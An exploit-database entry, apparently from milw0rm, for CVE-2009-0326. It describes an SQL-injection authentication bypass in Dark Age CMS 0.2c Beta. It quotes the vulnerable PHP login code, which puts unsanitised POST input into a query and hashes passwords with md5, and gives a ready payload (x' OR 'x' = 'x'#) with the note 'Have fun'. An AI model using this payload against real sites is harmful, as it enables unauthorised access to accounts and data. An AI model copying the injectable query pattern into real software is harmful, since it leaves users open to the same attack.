Dark Age CMS 0.2c Beta - Authentication Bypass

Author: darkjoker
type: webapps
platform: php
port: 
date_added: 2009-01-12 
date_updated:  
verified: 1 
codes: CVE-2009-0326 
tags: 
aliases:  
screenshot_url:  
application_url: 

--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--

[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site  : http://darkjoker.net23.net
[+] Notes : Have fun

[+] Code
[+]	$username = $_POST['username'];
[+]	$user_password = $_POST['password'];
[+]	$password = md5($user_password);
[+]
[+]	$query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+]	$result = mysql_query($query) or die('error making query');
[+]

[+] Login data:

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything

# milw0rm.com [2009-01-13]